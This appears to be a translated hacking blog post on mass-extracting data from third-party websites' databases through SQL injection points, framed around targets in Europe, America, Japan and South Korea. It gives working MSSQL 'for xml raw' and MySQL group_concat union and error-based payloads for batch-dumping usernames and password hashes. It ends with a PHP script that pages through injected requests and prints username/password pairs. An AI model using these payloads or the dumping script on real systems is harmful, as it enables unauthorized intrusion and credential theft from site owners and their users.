Recently, many people have contacted me about pulling data from the databases of target sites in Europe, America, Japan, and South Korea. On many of those targets it is hard to get a webshell. But what we ultimately want is the data, not the webshell; a webshell merely makes moving the data convenient. So I started wondering: why not pull the data straight through the injection point?
1. Retrieving data from MSSQL:
This mostly relies on for xml raw, which has been supported since MSSQL 2000.
Both of the usual ways of displaying data through an injection can be used: union select, or an error-based query. Take MSSQL 2005 as an example:
select username from members where 1=2 union select top 3 username from members for xml raw
Returned value (if a username is repeated, the duplicate is automatically removed):
<row username="admin"/><row username="Anna"/><row username="oldjun"/>
select username from members where 1=(select top 3 username from members for xml raw)
Return Value:
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value '<row username="admin"/><row username="Anna"/><row username="oldjun"/>' to data type int.
When the data volume is large, there is no webshell, but the injection point is usable, for xml raw is a good way to pull data in batches. To keep the returned value from being too large, restrict top to a smaller number, say 100. You will also need a script or program to process the returned value.
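As a sketch of that post-processing step: assuming the injected page echoes the for xml raw fragment somewhere in its response (here, inside the conversion error message shown above), a small script can pull the usernames back out. The regular expression and the sample response text are illustrative, not from the original tool.

```python
import re

def parse_xml_raw(response: str) -> list[str]:
    """Extract username attributes from a `for xml raw` fragment
    echoed back in an error message or page body."""
    return re.findall(r'<row username="([^"]*)"\s*/>', response)

# Illustrative response text, modeled on the error message above.
resp = ('Conversion failed when converting the nvarchar value '
        '\'<row username="admin"/><row username="Anna"/>'
        '<row username="oldjun"/>\' to data type int.')
print(parse_xml_raw(resp))  # ['admin', 'Anna', 'oldjun']
```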
2. Retrieving data from MySQL:
Here group_concat is widely used; MySQL >= 4.1 supports the function. Many people know it, but most of the articles I have read only use it to read table_name or column_name. Table and column names are small, so a single query can read them all at once. group_concat is rarely used to batch-read the actual data during injection, even though it improves both efficiency and speed.
That is because group_concat has a bottleneck: limit has no effect when applied directly alongside group_concat (the aggregation runs over the whole result set first), so group_concat reads a large amount of data at once, truncated at group_concat_max_len (default 1024). Most websites hold far more data than that, so once limit cannot be applied, how do we get the later rows?
In fact, a simple subquery lets group_concat and limit work together (0x7c7c7c is the string "|||" and 0x3a is ":"):
select concat(group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c)) from (select * from members limit 0,3) A
Return Value:
guest|||admin|||oldjun:084e0343a0486ff05530df6c705c8bb4|||...|||ad392a36c512176545900fd05772cbc6
After a little string processing, the first three rows of data come out. To keep the returned value from being too large, fetching fewer than 100 rows per query is generally fine.
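That string processing can be sketched as follows. This is an illustrative helper, not part of the original tool, and the hashes in the sample string are placeholders rather than real data:

```python
def split_pairs(blob: str, sep: str = "|||") -> list[tuple[str, str]]:
    """Split a 'u1|||u2|||u3:p1|||p2|||p3' blob (the group_concat
    output with 0x7c7c7c and 0x3a separators) into (username,
    password) pairs."""
    names_part, _, passes_part = blob.partition(":")
    return list(zip(names_part.split(sep), passes_part.split(sep)))

# Illustrative blob; hash1..hash3 stand in for real password hashes.
blob = "guest|||admin|||oldjun:hash1|||hash2|||hash3"
print(split_pairs(blob))
# [('guest', 'hash1'), ('admin', 'hash2'), ('oldjun', 'hash3')]
```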
3. Sample code (fetches 50 rows of MySQL group_concat data per request):
<?php
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' start end (end: count/50)
Example:
php '.$argv[0].' 0 9999
Author: oldjun (http://www.oldjun.com)
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set("max_execution_time", 0);
$start = $argv[1];
$over  = $argv[2];
for ($i = $start; $i <= $over; $i++) {
    getdata($i);
}

function getdata($i)
{
    $resp = send($i);
    if ($resp) {
        // The injected query wraps the data between "<<<<<<<<<" and ">>>>>>>>>" markers.
        preg_match("#<<<<<<<<<(.*?):(.*?)>>>>>>>>>#", $resp, $value);
        if ($value) {
            $namearr = explode("|||", $value[1]);
            $passarr = explode("|||", $value[2]);
            for ($j = 0; $j < 50; $j++) {
                echo $namearr[$j]."|".$passarr[$j]."\n";
            }
            unset($namearr);
            unset($passarr);
        } else {
            echo $resp;
            echo "value error, retrying $i\n";
            getdata($i);
        }
    } else {
        echo "resp error, retrying $i\n";
        getdata($i);
    }
}

function send($i)
{
    $limit = $i * 50;
    // The code that sends the request is omitted; it should return the response body.
    // Example injection statement:
    // union select 1,2,3,4,concat(0x3c3c3c3c3c3c3c3c3c,group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c),0x3E3E3E3E3E3E3E3E3E3E) from (select * from members limit ".$limit.",50)#
}
?>